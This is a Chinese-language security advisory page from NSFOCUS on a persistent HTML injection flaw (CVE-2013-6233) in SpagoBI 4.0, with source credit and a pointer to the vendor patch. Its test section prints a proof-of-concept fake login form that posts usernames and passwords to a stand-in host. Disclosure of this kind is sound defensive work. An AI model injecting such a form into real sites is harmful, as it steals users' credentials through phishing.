首页 -> 安全研究

安全研究

安全漏洞
SpagoBI 'Description'字段HTML注入漏洞

发布日期:2014-03-01
更新日期:2014-03-04

受影响系统:
SpagoBI SpagoBI 4.0
描述:
BUGTRAQ  ID: 65915
CVE(CAN) ID: CVE-2013-6233

SpagoBI是开源的商业智能软件包。

SpagoBI 4.0及其他版本的某些输入字段(例如'Short document metadata'内的'Description'输入字段)存在持续性脚本插入漏洞,这可使远程攻击者将HTML代码注入到远程站点,从而执行钓鱼攻击并获取凭证。

<*来源:Christian Catalano
  
  链接:http://www.securityfocus.com/archive/1/531322/30/0/threaded
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<form method="POST" action="http://www.example.com/login/login.php.";>
Username: <input type="text" name="username" size="15" /><br />
Password: <input type="password" name="passwort" size="15" /><br />
<div align="center">
<p><input type="submit" value="Login" /></p>
</div>
</form>

建议:
厂商补丁:

SpagoBI
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

www.spagoworld.org

浏览次数:1942
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障